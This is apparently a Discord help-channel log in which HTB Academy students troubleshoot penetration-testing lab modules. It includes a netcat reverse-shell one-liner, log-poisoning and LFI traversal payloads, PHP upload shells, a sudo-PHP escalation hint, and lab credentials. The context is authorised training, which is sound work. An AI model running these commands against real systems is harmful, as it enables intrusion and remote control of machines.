#modules
there's also gonna be one for AI Red Teamer; WHEN that drops, who knows
usually it's not the vouchers that go on discount
btw
it's the annual plans
when there is a new cert there is a discount for all vouchers?
and typically the one relating to the cert
oh shit am cooked
i.e. silver annual if it's a cert that doesn't have tier 3 or higher modules
gold annual if it's a cert that has tier 3 or higher modules
the most important thing to take away is the knowledge, certs are just fancy pieces of paper that say you did a thing. But the knowledge is what should stick with you
then can you be my mom and pay for it
are you rich
dude
what
get back to studying
okay mom
don't
please keep the channel on topic
just quit while you're behind
then I will hack a website then get bounty to pay for it
get back to the modules; study up
okay
okay dad
You can send me a DM if you are still stuck on this one.
Ohhh ok
is there a way to share HTB Academy profile link same as ctf profile??
Attacking Common Applications | osTicket
I can't seem to get a working login. Tried both of the creds that were listed in the module - also googled around to find a dehashed.py script, but that doesn't work. Just a bit confused, is this box not working properly, or am I doing something wrong? Please @ with replies
just gonna have to reset the box until it works for me. Separate user reached out and told me it's something on my end
Any ideas on how to move Calc.exe to the desktop? I am stuck on this finding evil module
i have the exact similar issue
did you solve it?
did you solve it?
i have the same issue : (
Hello I need help in the password attacks module please
for the Writing Custom Wordlists and Rules in Password Attacks I need help please
Hi, I am seeking clarification on the correct way to solve this question:
Module:
HTB CDSA Path -> Windows Attacks & Defense section -> Kerberoasting
After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user?
What I have tried:
I searched through all the security logs, Server Roles custom views, and Applications and Services Logs, however I could not find any reference of an SID for the webservice user. I searched using EventID 4769 using the filter in the Security logs section, however I did not see any entries for the webservice user. I also tried checking EventID **4624** for a possible login but I did not find any entries for the webserver user.
I looked in the chat's history to see if someone else had answered it but I'm still confused
My workaround
I pulled the SID directly using Get-ADUser "webservice". But I feel as if I missed the entire point of the lesson doing it that way. Can anyone explain where I went wrong?
Thanks!
Hello I need help in the password attacks module please
for the Writing Custom Wordlists and Rules in Password Attacks I need help please
you can DM me
good
Hey all I am having issues with the File Upload Attacks Whitelisting challenge question in CPTS.
I have successfully identified multiple extensions the page will accept. I upload a file with a php cmd payload that shows "file uploaded successfully". When I navigate to the page I keep getting a 404 error. I have encountered this issue with multiple file extensions that were accepted, tried resetting the box, and still get the 404 error.
you can DM me if you want
Im rn in the Windows Command Line module , i have a single exercise left but im not able to access the required machine from my vm , its giving out "ssh: connect to host 10.129.248.223 port 22: No route to host" as the error
has anyone faced this?
no..i didnt manage to.
It's our birthday… but YOU get the gifts
For a limited time, score 25% off HTB Academy's Gold & Silver Annual subscriptions. Access industry-shaped paths (including AI Red Teaming!), hands-on cybersecurity training, and get access to what's coming next (there might be a new certification coming your way 🤫).
⏳ Offer ends 31 Dece...
Hi everyone, I'm stuck on this module - "Firewall and IDS/IPS Evasion - Hard Lab", would someone be willing to answer a couple questions i have please?
find the source of your problems before scanning (this is gone over in the reading)
yes that part i understand, i guess my only question is i am supposed to click the button to download the new vpn connection file correct? and from what i understand it should be the "academy-hard-ovpn" but mine keeps downloading the "academy-regular.ovpn"? or am i completely wrong lol
you're completely wrong
all academy modules use the same vpn connection, much like you can do all the active machines on labs from the same vpn config
also you didn't get a diff vpn for the easy lab either, they're all the same
ok, so i should be able to just open my pwnbox and solve it? im just doing it wrong then?
the only different vpn entirely is the Exam vpn
pwnbox is the in-browser vm, that shouldn't be running at the same time you're using the vpn on your end.
ok. so that button that lets you download the vpn is only if you're using your own vm? if you're using pwnbox you don't need that? sorry if these are stupid questions i'm still fairly new
correct
ok thank you
https://academy.hackthebox.com/course/preview/intro-to-academy <-- this module should explain most of how academy works
ok awesome, i appreciate it
Working through Attacking GitLab
Anyone know what the issue here is?
└─$ nc -nvlp 8888 listening on [any] 8888 ... connect to [10.10.15.130] from (UNKNOWN) [10.129.99.59] 50106 bash: cannot set terminal process group (1294): Inappropriate ioctl for device bash: no job control in this shell git@app04:~/gitlab-workhorse$ exit /bin/bash shell python3 -c 'import pty; pty.spawn("/bin/bash")'
Tried a couple of different methods that I could think of, but I know I have to be doing something wrong
literally the first line says -> exit
so something is up with your shell
I just copied from the module....
'rm /tmp/f;mkfifi /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc <my IP> 8888 >/tmp/f '
i'm just going off what I see where literally the first thing i see is exit
also it's mkfifo, not mkfifi
Hey there how's it going?
Does anyone know how would you upload a file into an HTB vm?
i have to encode it in my actual PC and decode it in the VM, right?
yo , i just tried it , it worked, Thank you
hi for the one question of the Tapping into ETW section of Windows Event Logs and Finding Evil module, I am having trouble figuring out how to find the method. Is anyone available for DM?
I have been at it for an hour or so now maybe one and a half hours
I really want to solve this one
I am on windows priv esc , outdated server section . When I try to xfreerdp I get error about ssl . How can I fix it ?
hi I am following the exact instructions for Tapping into ETW section of Windows Event Logs and Finding Evil module and it still won't work. Can someone hint me in the right direction?
this is for the only question of section
I know I asked earlier but is anyone able to DM?
is there a way to revert back to original htb UI like in the academy or no?
Attacking Common Applications | Attacking CGI Applications - ShellShock
I'm quite lost here. The module explains how to test for the vulnerability. What I don't understand is where to test for the vulnerability. They suggest this is to be done in some sort of terminal on the target website. But, when I hit the website, it's a default Apache site, and I can't appear to get anywhere else... Can I get a nudge or something? Please @ with replies
The commands in the module are executed on your attack host
Oh alright
hi is anyone able to DM who has done CDSA?
So just follow the content/walk through and you should be all good
Use the flag to ignore the cert
Hey there , how's it going? struggling with "Working with IDS/IPS" module, i'm stuck at "Suricata Rule Development Part 2 (Encrypted Traffic)" section.
What is that flag? If you mean /cert:ignore , It didn't work for me
Maybe another client like rdesktop or remmina?
hello i'm stuck on this module 😭 https://academy.hackthebox.com/module/268/section/3064 i succeeded in resetting the password on endpoint /api/v1/authentication/customers/passwords/resets/sms-otps but the user doesn't have a role attributed to itself. btw i succeeded in the challenge on the course with file upload but I don't know what else to do
tried so many strings including GrftgretGF45 , which didn't even work
i found the flag for everyone who is stuck Unrestricted Resource Consumption dm me x) it's very tricky
Really weird how for the module privileged access, I was able to ingest data with bloodhound-python on linux but could not query CanPSRemote. Yet running Sharpview on Windows and using the GUI worked FINE. To troubleshoot, I even tried downloading the zip from windows and it still failed on linux Bloodhound CE.
After searching Discord, it seems like a lot of others have faced this problem too
Hi, I am stuck on Attacking common application WordPress - Discovery & Enumeration question 3 - Find the version number of this plugin. (i.e., 4.5.2)
I read the readme.txt file and it gives me the version, but it isn't working
I found the version near softwareVersion and near changelog
Found it
I was in the wrong page

hi guys I am still stuck on Windows Event Logs and Finding Evil - Tapping Into ETW question 1. I am following the exact instructions from the section but it isn't working
I did everything exactly as the section specified
Hello currently doing the File Upload Modules under the white list filters, I am trying to bruteforce for whitelisted PHP extension in turbo but all response are Only images are allowed
Dm me!
Hey man, excuse me, I would like to ask how the problem of DNS Spoofing (Attack) in HTB Academy Wi-Fi Evil Twin Attacks is reproduced? I have tried many times and can't get the answer I want, can you give me some hints?
is it in your /etc/hosts file?
└──╼ [★]$ cat hosts
127.0.0.1 localhost
127.0.1.1 debian12-parrot
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-kual6aviq9 htb-kual6aviq9.htb-cloud.com
It doesn't have to be; this is a publicly available website. The problem is free accounts can't access it with pwnbox.
Hi there, just wanna check if anyone cleared SQLMAP Essentials -> Attack Tuning. For Case #5, is the flag different from what the answer is expected of? I got the flag from the db already but the website is rejecting it. There's no space at the suffix so i'm confused why am I wrong
hi guys, Im doing the Attacking Common Applications - Exploiting Web Vulnerabilities In Thick-Client Applications
I modified the User.java file to remove the hashing and stuff, and reassembled the jar file, but when I run it it no longer works
like the assembled jar file doesnt even open 
so who is the owner of the module?
how can i ask him question here?
bertolis
@sick fulcrum
is that you?
i don't know how to solve android dynamic analysis - for the insecure library load through deep linking - the app doesn't update to v2
and i cannot solve it with the provided solution, could you please help me?
i have a problem in AD skill assessment 2
i have made a reverse shell with the sql and used mimikatz to dump the ntlm hashes using lsa_dump_sam from meterpreter but the hash i found of the admin didn't work and when opened a writeup it was a different one and the hash from the write up worked why is that is the ?
sqlmap is pretty buggy.. got two different flags after refreshing the machine
IMO at this point in the path and content you should know why it didn't work. Think about the hashes you dumped and what accounts they belong to. I'm definitely not trying to be difficult or mean, but I believe you actually know the answer as to why it didn't work and just need to think about the overall context of what you have.
Module : Abusing HTTP Misconfigurations
Section : Web Cache Poisoning - Tools & Prevention
Question : Use WCVS to identify an HTTP header vulnerable to web cache poisoning in the provided web application.
can you help me please , i have done everything and i have submitted multiple answers but none of them work
I am in the wordpress hacking module doing the skills assesment. Why am I not getting the actual request despite sending a POST req and the content-length being 403?
Am i missing something here or there is something off here?
hello guys , have anyone encountered some problems form the revshell via splunk
i get to download the tarball with the powershell pointin to my attackin machine but it seems like its not executin when i download the package
you wouldn't be the only one. i have encountered everything wrong in splunk unfortunately :(. here's hoping we get a response.
did you get the rev shell on the attackin splunk section ?
cuz i've done all the steps idk what am i missin
Nope. but i think there are issues with splunk in general
so basically i can't submit the flag
i may use some recent cves and see if they'll work
Yup, tell me about it!
How do you do that?
might be handy for my lab too and if you could tell me i'd appreciate it
Thanks
Hey everyone
system!
- 5 Start the above target, copy the shown IP:PORT by clicking on them, and then paste them in your browser. What's the proof shown in the page?
Can someone help me with this please
I have a silver subscription already... if i get the 25OFFANNUALDEC25 deal, will it stack ontop.. so i get 12+ months when my current runs out ? *im not really sure where to ask tbh
Please don't ping random people for a question
Also make sure you ask questions so that people can actually help you by reading this #modules message . I don't know what module/section you're on by reading your question
Ask support
Need some help? Learn how to reach the support team on Academy.
Word of advice - normally you can google the question you're on within a module and you can find a HTB Forum page that will help
there're only authenticated cves can't find some anonymous ones , I can't figure it out
dang , guess we're both stuck on this lab then, smh. thanks for the update.
Is the app you installed showing enabled within Splunk?
Can you post the link to the section you are working on so I can verify we are talking about the same section?
Cool that's the one I thought, so go ahead and send me a DM and I'll look over what you have going on.
thank youu man
Does anyone know how to overcome powershell breaking when following the module instructions?
If someone knows how to install apps in splunk would be much appreciated
Attacking Common Applications | Attacking Splunk?
Nope
I am seriously stuck on "Firewall and IDS/IPS Evasion - Hard Lab". Is there anyone who is willing to help me out
I mean installing an app in splunk should be the same
Top of the screen should show "Apps" (towards the top left) then go from there
yeah thing is : when i go to install any app, it always gives me an error
What error?
what are you trying to do in this app? I'm headed to lunch right now - if no one else can help / you don't get it I'll try when I come back
I want to use it to search as asked
sysmon
Can anyone kindly help with this? it won't take the missing process despite it actually being missing
Hey guys, anybody passed recently "Skills Assessment - Password Attacks". I mean recently? (nexura administrator NTLM question) I heard that that assessment was changed recently.
I believe I checked everything that there is shared on FILE01 server that user hw.... has access to, and I see nothing of interest.
What's the next step? Bforcing other domain users (stom, bdavid) or what? Completely lost.
Hey , is it okay if i DM you?
Revisit those shares and see if there are any protected archives of interest.
yes there are some old password psafe3 files, but no password for them.
Revisit the cracking protected archives section to see what is possible.
That's what i mentioned initially. If pwd cracking is expected i believe it would be fair to hint which pwd list is the correct one (rockyou i suppose). I don't believe there is too much education in targeted cracking because it is utterly unreliable in real world.
But thank you for your suggestion r1ckyr3c0n!
Yeah for the most part rockyou will work for things like that.
Hi
Hey someone does know which lab is the "Skills Assessments" of the Attacking Enterprise Networks module?
I'm guessing is the last one(?
hi is anyone able to help me with the Tapping Into ETW section of Windows Event Logs and Finding Evil module?
like today? one on one?
Just want to express my distaste and dislike for the Thick Client Applications modules.. What a confusing module to go through...
Every "valid" password I've found is marked wrong
Hi guys - so currently on the Crackmapexec module > Kerberoastable sections > Trying to get accounts. No matter what i do from the pwnbox I get nothing back. I've even copied the syntax from the 'show solution' and it gave me nothing back. Any ideas?
nvm, I'm stupid
Hello all
Please help me in academy sql fundamental, last exercise skill injective : The last task cannot be injected, and the task site works without VPN and on the https protocol.. who can help with it?
Chattr
you can DM me if you want
Rockyou isn't needed
@tame wave be careful with sharing screenshots that contain answers
Its injectable, you may have to bypass login first
Hey guys
By any chance does anyone know why answers of the wifi penetration testing tools and techniques are not available?
In the "Pass the Ticket (PtT) from Linux" module from Linux. I was able to use Julio's ccache ticket from linux01 to log into his account on MS01 via proxychains and evil-winrm. I then used a powershell command to extract keys via Rubeus and Mimikatz, however, all of the tickets tied to his account were http service tickets - which (to my understanding) won't allow us to access C over Linux. Was anyone else able to export Julio's tickets from MS01 and then convert the .kirbi or base64 ticket into ccache and then upload to Linux to access C?
If the kirbi files found in memory are expired, you might be able to request new ones. Look into over pass the hash attack
Ah I didn't even think of that sorry
Ah then I guess I took a different route to working through it.
Hey guys, In the log injection section of the HTTP Attacks module, does anyone know how to bypass the filter for < and >?
could someone please assist with case 7, ive spent the past 2 days trying to get this flag to appear but nothing is working and I needing to do more to the command ?
https://academy.hackthebox.com/module/58/section/526
Mutual
i think it was made from some part of an insane lab
i hope all insanes don't look like this lol
hello everyone sorry what Im about to say is not related to modules but I cant remember wasnt there like a /feedback or something sorry!
Yeah /feedback
can i DM anyone about the Broken authentication skills assessment please?
never mind solved it.
omg thanks hahaa
Hi friends, currently at skills assessment of Password Attacks module. Ssh'd into jbetty user in dmz but when I run proxychains, it reads command not found and when I try to install with sudo it throws an error " "jbetty is not in the sudoers file". Proxychains.conf file doesn't exist either. Anyone having an idea what I am missing ?
I'm gonna restart the lab, see if that fixes the problem
Why not use that host as a pivot, do dynamic port forwarding ssh, or just use Chisel or Ligolo? I think that would be a better option.
they're not installed on this host. I will terminate the target and fire up a new one
I don't know about dynamic port forwarding ssh tho, I'll look it up. Thank you
if you meant ssh -d , If I recall correctly that also timed out I believe bc there was no route to other hosts than DC01
in /etc/hosts file and since I was not in the sudo list, I couldn't edit it either
Ah, okay. In the password attacks, it seems to be assumed that you already know how to perform pivoting. You can try transferring pivoting tools such as chisel or using ligolo. If you want, I can help you. Send me a DM.
just did
For future reference, necessary tools are installed on the attack host. Not the dmz
Ive found if theres a folder called tools (usually inside home or C: ), if not present, no tools (intentional)
I noticed on the "Windows Privilege Escalation" module that users (which are no administrators) can get their privileges through UAC...I just didnt quite understand how this works.
Basically the htb-student user has the standard low privilege rights. I checked groups etc. and there is no admin group from what i can see. When i prompt the cmd.exe with "Run As Administrator" then i get the Privilege assigned (SeTakeOwnershipPrivilege). I authenticate against UAC with the htb-student user. In the "administrative cmd" the user also doesn't have any administrative groups.
Can someone explain why this happens and/or works?
the privilege is disabled by default in the standard user context, you need to elevate through UAC to see it, as thats where you get the full token where the priv is available even if you arent an admin
so you arent an administrator, and UAC doesnt give you admin privs, UAC just gives you that privilege
you can then use that to take ownership of files you need to elevate or have creds in them
did you run into a powershell bug where it stopped working if you disabled file/folder deletion in temp?
Just to get monta to work I had to run a couple different things as admin - but gave up after that @mellow niche
I'm in the same boat. The default message is not specified and is "classified as ham" 100% or anything over 90% or some other threshold? I have manipulated all of the messages listed on the page in my local instance to come back as ham, but they all fail to pass the question. Same thing with manipulating the model, I can get it to classify as required by the question yet again no pass. If you don't know what the question is or the format required or the way the answer is evaluated to answer it defeats the purpose. I had the same issue on the Immersive Labs platform, so they reworded a number of their questions. If the response format is well defined, then it is simple to answer the question. When formatting is unknown or there is ambiguity in the question, the module becomes tiresome and the platform becomes far less valuable as this module has now become a waste of my time as I do not know how to answer the question.
Which question was the issue? It's hard to tell from this
I am beyond lost with the introduction to nosql injection skills assessment part 2. Anyone have any pointers. The entire module was not bad then just completely wrecked!
ok but is this always the default? So can users with additional privileges just use UAC and only then get them assigned? it's probably related to the switch into the High Security Context from Medium Security Context
guys i got a flag but it keeps telling me i put it wrong
i did copy paste
and try all the ways to put it
what part of it should i copy and paste, like i try to put all of them but it just won't work
Red Teaming AI - Manipulating the Model
The default message is not specified and is the question content "classified as ham" 100% or anything over 90% or some other threshold? I have manipulated all of the messages listed on the page in my local instance to come back as ham, but they all fail to pass the question. Same thing with manipulating the model, I can get it to classify as required by the question yet again no pass. If you don't know what the question is or the format required or the way the answer is evaluated to answer it defeats the purpose.
This appears to be a common problem with this module. The questions can't be answered because no one knows what they expect the format for the answer to be
Having super weird VPN issues... VPN keeps connecting, then reconnecting and it's an endless loop... downloaded a new file, same thing... Any ideas on how to fix? Please @ with replies
@grizzled schooner
I'm having trouble as well, I did not further investigate though.
But my VPN is not having a great time today..
That's not what I'm getting!
and it just keeps looping
Can't even do this module, because the VPN keeps buffering (?)
I do have trouble too
US or EU?
EU
Are you seeing the same thing happening as I am?
I actually don't because I use the vpn a different way and i can't see the logs but I can't ping the machine I start on the lab after 2 minutes so I restart it over and over again
Willing to bet it's the same thing happening...
yeah I'm just gonna stop and continue tomorrow
I'm working on NFS in the fingerprinting module and I found the nfs shares on the target but no matter how I try to mount the shares i get "mount.nfs: access denied by server while mounting 10.129.223.91:/var/nfs" I've tried setting version, nolock, connection types but I can't seem to get anywhere. Does anyone have any guidance?
It's been a super long time since I've done that, but have you tried with sudo? Sounds dumb but does work
fair, I did have sudo and I read through the redhat common mount options page and tried all the settings from there but no luck. I've also tried resetting the box, so now I'm stumped.
Hmm... I'm not too sure, sorry!
tun1
sudo killall openvpn
then reconnect
fair, thank you
While vpn running? lol
did u run sudo mount -t nfs ?
it'll kill the running process anyway
but there's something going on where openvpn didn't terminate another connection you had running, which is why you have tun1 there instead of tun0 (unless you have another vpn tunnel running for another service)
I tried with other options as well but this was the basic command: "sudo mount -t nfs 1target:/share ~/Documents/t/ -o vers=3,nolock" and the folder t does exist there
when you ran showmount -e did you see NFS shares?
yeah, there were two shares, /var/nfs and /mnt/nfashare/
So I had sudo mount -t nfs 10.129.180.251:/var.nfs ~/Documents/t/ -o vers=3,nolock
Why are you specifying version?
I was messing around trying different options. vers 3 is the only one that exists according to the nmap scan, so I tried specifying version to see if it would help
have you tried making directories for those NFS shares?
Enterprise links wont work as theres a key part linked to your organization as part of it
can somebody help me. when i am connecting to vpn then it takes too long and fails to connect
Try one of the steps that are related to your error:
https://help.hackthebox.com/en/articles/5185536-connection-troubleshooting
VPN issues? Slow connections? Can't reach machines? Start here!
thank you very much bro
When i get the flag? (Introduction to Windows Evasion Techniques module)
You have to follow the instructions precisely
FootPrinting-> IMAP/POP3
Trying to solve the labs, i am having trouble connecting to the target using creds || robin:robin || it is giving me error (from ncat)
"Plaintext authentication disallowed on non-secure (SSL/TLS) connections."
but using openssl to connect to the target won't give me any response backs, anyone faced the same issue?
i am using this command to connect
openssl s_client -connect 10.129.232.190:imaps
Are you using tags within the queries/commands?
no, just a LOGIN robin robin
but the error is not about it isn't it
Hi,
I'm currently doing Attacking FTP from Attacking Common Services. But the box seems to not show service on port 2121 running… is anyone experiencing the same issue ?
Attacking GraphQL: After executing an introspection query, what is the flag you can exfiltrate? I don't seem to see a flag after the query. Can someone pls give me a hint of sort?
Hi,
I'm currently doing Windows Attacks & Defense Kerberos Constrained Delegation part on the soc module and i can run this as it says in the attack
Import-Module .\PowerView-main.ps1
you don't just run it, you import it.
also don't forget to set the execution policy to bypass
yeah facing the same
F
me too
What happened to HTB ?
Most applications are not working. I think it's again the cloudflare
turns out not only me having this problem
me
but i redid the nmap and somehow it shows on the second try
Yeah The problem is for all
yup fixed now
yeeeeah boy
i will try but i think i did it
it worked thank you
Why are the AD modules so weird? I'm doing the enum & attacks on AD module, literally can't RDP tried soo many different things, finally just moved with working on winrm. This is what I faced on the "misc misconfigurations" and the attacking domain trusts as well
:/
i need help on Windows Attack and Defense Print Spooler
Having trouble with submitting the answer to the last question. I completed the attack, connected to DC1, changed the registry to prevent the attack and restarted DC1 and attempted the attack again. The question says to submit the error message as the answer when running dementor.py from the kali machine it lets us spawn. I copied and pasted the error message but it tells me the answer is wrong. Any help would be much appreciated.
Error message that i received.
[-] exception RPRN SessionError: code: 0x6ab - RPC_S_INVALID_NET_ADDR - The network address is invalid.
What options did you use ?
in Skills Assessment - Password Attacks im in the JuMp server and i got an admin password from the tmp folder.. is that a rabbit hole? should i even reach dc or can i dump lsass then provide the hash?
I keep getting the ERRCONNECT_CONNECT_CANCELLED and get disconnected, I've tried everything but it just refuses to work??
Does this module don't include RDP login creds? practical only comes at setting up handler and ssh (https://academy.hackthebox.com/module/158/section/1427)
Teaches what to do on windows but you can't do it personally because there's no creds.
please be mindful while trying to ask for clarification in a section in terms of not taking a screenshot of the contents of the whole section
Good morning everyone. I've just finished with the Web Enumeration section of Getting Started. I'm going back through the steps to try and use curl as much as I can to get more familiar with it and I'm getting hung up on using the credentials to get through the login portal tried using curl -u <username>:<password> http://<IP Address>:<Port>/. Any tips? Thank you!
try to put the Username and password in the URL
http://username@password:IP:PORT
If you are stuck on the HTTP response splitting you can DM me. Just know you have everything you need to inspect what is happening and perfect your payload.
is there any machines that looks at any idps?
does the last sentence sound logical?? feel like its a #1234357888114364508 , but dont feel like i have to make a post if its just me misunderstanding
Does anyone else encountering this problem?
I have before. Just try a different pwnbox area.
Not working 🤷‍♂️
Need some help? Learn how to reach the support team on Academy.
^ then reach out to support
I am on the broken authentication module. The first brute-forcing passwords question: what is the password for "admin"
The example uses rockyou.txt
In the workstation: there's 20+ rockyou.txt.
Does anyone know which rockyou.txt file I should use to ffuf the password with?
they're generally all gonna be the same, though the example should give you the wordlist location if i'm not mistaken. otherwise just pick one and go
Will try the -70… wish me luck!
ah yeah they are broken into sections in some places
there should be a full list on the machine
if you are still stuck you can DM me if you want
just run it twice :v
im confused as well on that part haha
I had trouble with this the script would lock up I just ended up trying a bunch of pins the output made
hello, yall do have some target problem ? like i can't ping them after 5 minutes I have to launch the target again. I tried changing vpn
if you describe your question in more detail, more people would be willing to help you
i fixed it, it's just about the reverse shell
After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag
guys here when i do sudo -l
(ALL : ALL) NOPASSWD: /usr/bin/php
so i need to make a php file that can read the root.txt file?
You have sudo right on this binary so look under SUDO section on gtfobins
You can leverage to root instantly
ty bro so much
New to HTB, doing the File Transfer module. Is there an easy/quick way to get the upload_win.zip onto my Pwnbox, or is getting that onto my Pwnbox to get to the target machine just part of the challenge?
hover over the zip file, copy link and then try " wget link(copied link)" in the commandline
No dice. I can ping academy.hackthebox.com from the Pwnbox, but get a timeout when trying to wget/curl.
have you tried browsing to academy on the attack box
Yes, times out on the Pwnbox browser, too.
how about you base64 encode the file on your own pc's commandline , copy the output and paste it in your attack box command line to decode it there
I'll try, it's a zip file, but I can unzip and do. Thanks for the idea
You figured it out?
yeap turns out I was trying the wrong username lol
Cool
Look at the last section before skills assessment.
Not sure if this is related, but I was getting the hash from mimikatz through SSH and it was failing the auth, until I used RDP and the same mimikatz returned a completely different RC4 hash that worked for the logistics$ account
@iron yarrow the module is above tier 0; please refrain from sharing spoilers for skill assessments. as a reminder, the module tells you about several different methods for bypassing some restrictions
Has there been an issue with spawning targets???
Idk but I am facing another issue, I can spawn the machine. But can't query the cross forest at all ...... ?? Im stuck at the cross forest attacks from windows part because I just can't get any kind of users from the other forest?? Could someone help me with this please
I see the error "a referral was returned from the server"
@foggy jackal Hi v2 is working if it installed on actual android phones
Anyone knocked out the module "Introduction to Linux Forensics" Stuck on the meterpreter uuid question..
Thanks.
I finished the skills assessment a few days ago.
What part of a TE.TE smuggled request will prevent the second request from being cut off? Or what should I study to figure out the answer to my question?
is that a question from the module? if so -- it should be explained within the module reading.
It's not an actual question in the module but it is an issue I am having. I'll read it again but I don't seem to see anything in there that discusses what might cause some of the requests to be served fully and others cut off half way? I've played with keep alive and see some improvement but not enough. Thanks though
well TE.TE is just transfer encoding Frontend.Backend; what can cause cutoff is simply the modification/change to the request; maybe the portswigger page can help you figure more out https://portswigger.net/web-security/request-smuggling
it's just obfuscating the header
Thank you! I will try that. The chunk size should make a difference but I'm having issues wrapping my head around this. It's only an issue when sending requests every second. Which tells me my request is not clean and precise.
hello guys, just wanted to ask whether you guys have a connection problem to the academy these past few days or not
no man its working all fine
workin for me too
aight aight
Can you help me with this question? I'm honestly close to losing my mind.
I have 13 Azure users and 3 that have a path to Global Administrator, but that still doesn't seem to be the correct answer.
What am I missing?
In the Footprinting module, the DNS part, couldnt find the subdomain with IP ending with octet 203, after turning on step by step solution i found that the subdomain is in the namelist wordlist, the question is in real pentest how to know which wordlist to choose? Is there any thought process which leads to the right wordlist?
I do
connection keeps breaking right
yes, can't even ping the machine i have to reset
I'm on the footprinting module and I keep getting problems after less than 5 minutes...
yea im at attacking common services
Skills Assessment - File Inclusion
Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
I need help
Where are you stuck?
I managed to send the file, I sent PHP, PDF, and JPG.
I found a parameter but I can't explore it because it says it contains invalid characters.
hey can anyone tell me if we need to reach DC to submit the hash or can we just grab the admin hash from other accounts? for saw jump 1 (Skills Assessment - Password Attacks)
Have you tried to leak source code maybe ?
Hello, in the web fuzzing module validating findings section, it tells me that I can just read the header and read the content length to see if the page exists or not. I was wondering if that's what I am supposed to do in the real world and I can't really read the sensitive web pages
I mean backend source code
With what you were taught during the module
How would I find the back-end source code?
That's all the point of the File Inclusion module :))
yooo im at skill assessment - easy attacking common services, im having trouble as i dont see an entry point. I suppose that i can enumerate users from smtp, but turns out it doesnt give anything as well. Read the writeup and it's supposed to give me something. Do you guys have this problem as well, but the first entry point is not the smtp?
try to adjust your wait times
try 15+ seconds
guys i'm in Password Attacks module - pass the Certificate and i'm stuck with winRM error
what does the error say?
Cannot find KDC for realm "INLANEFREIGHT.LOCAL"
is your krb5.conf properly set?
hmm... run nxc smb <target_ip> -u 'whatever' -p '' --generate-krb5-file file && sudo mv file /etc/krb5.conf
sorry, make sure to add the target ip too
alter the one at /etc/krb5.conf
run the command i sent
will create your file, move it there
[★]$ nxc smb 10.129.231.223 -u 'wwhite' -p 'package5shores_topher1' --generate-krb5-file file && sudo mv file /etc/krb5.conf
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Creating default workspace
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing VNC protocol database
[*] Initializing WMI protocol database
[*] Initializing FTP protocol database
[*] Initializing RDP protocol database
[*] Copying default configuration file
usage: nxc [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL]
[--verbose] [--debug] [--no-progress] [--log LOG] [-6]
[--dns-server DNS_SERVER] [--dns-tcp] [--dns-timeout DNS_TIMEOUT]
[--version]
{mssql,winrm,ldap,smb,ssh,vnc,wmi,ftp,rdp} ...
nxc: error: unrecognized arguments: --generate-krb5-file file
hold please
pwn box nxc is outdated, do it manually, edit /etc/krb5.conf @minor belfry
or you can upgrade your nxc version and rerun the command
can you give the proper thing
i have done it before and it didn't work
what to write in krb5.conf is what i mean
does the file exist?
yea in /usr/share/samba/setup/krb5.conf
that one
save this script for later when you need to redo this, and make it a habit to update your nxc, pwnbox's is quite old
yea ik but my internet sucks so i have to use pwnbox for now
all good
module is above tier 0, please refrain from spoilers :)
Hello, i am stuck at injection fundamentals module, section skill assessment, can i dm someone for a nudge on initial access. I think i must do a sql injection to register myself but nothing seems to work.
Is it ok to just follow the walkthrough for AEN to save time and start the test.
lol
instead of blind*
that's up to you; the reason it's recommended blind is to test your methodology. It's not about the time it takes
is the module section only available for vip people?
where do i find it?
nvm found it on the top right
sheesh those modules are expensive haha wallet is gonna dry out
that's why the plans are the better value overall
that's what the % discount means on the monthly plans you save x% compared to buying the same amount of cubes directly
will take a look into it, pretty interesting, thanks
I hope if HTB has a module about PHP
Hi, I'm stuck on an exercise in Introduction to Bash Scripting section comparison operators, and I don't know what I should do in this situation
Document and reporting practise lab. I can't find the admin credentials to log in to the report writing web app on port 443 as mentioned in the course. The admin credentials are not provided. Please help!
you can DM me if you are still stuck
Hello everyone. I just finished a lesson on organization in the setting up module of the Information Security path. I was a bit confused with the notes on Logging at the latter part of the lesson. Am I to make those changes in the VM instance? Also, do I need to download some of the tools recommended, seeing how I'm just starting the lessons as a beginner?
Hello guys, I'm new here and I'm stuck to the Skill Assessment in File Inclusion Module.
I can read the /etc/passwd file and look for Log Poisoning.
I have the following path GET //api/example.php?p=....//....//....//....//example//example//example//access.log
I injected the PHP Payload with the user agent and can see the payload in the log. When adding the '&cmd=id' to //access.log request, nothing happens. Why? What am I doing wrong?
You dont have to
Noted thanks
Make sure you use the right quote set (in the terminal you may need to escape the quotes)
If you still need help, DM me
Is there any way to make the rdp session from the citrix breakout section in the winprivesc module be less painful? Opening a browser on that takes ages, I'd imagine the rest would be even worse
There is a little guidance on making RDP a little more efficient, but unfortunately, at least in my experience, Citrix IS pain.. Maybe the guidance here will speed up the RDP session a bit, some have found adjusting the MTU to help with RDP issues, but that was more on actually connecting than performance IIRC. Only other suggestion I can give would be to ensure you are on the VPN location most appropriate, and lowest load showing on the VPN settings screen
If you want to check latency from your connection to the VPN edge server, you can check the ping to the host defined in your ovpn config file (e.g. edge-eu-academy-1.hackthebox.eu)
https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn#h_480d492483
All you need to know about the VPN Connection for Academy
Hello there, i am actually doing the SQLMap fundamentals module and i have a question, does SQLMap work on https?
I found people saying yes and people saying no...
Yes
Anyone who's done the recent "WiFi tools and techniques" module could sanity check me quickly for SA Q5? I've done all the other ones, but I'm hitting a skill issue on this one it seems.
Thanks! I'll check it out
You might need to add --force-ssl
just found the answer reading the man ^^
Did anyone manage to get the "XSS and CSRF Exploitations - XSS Filter Bypasses task" working? Facing weird cors error from browser, but it was working the whole module lol
so weird.
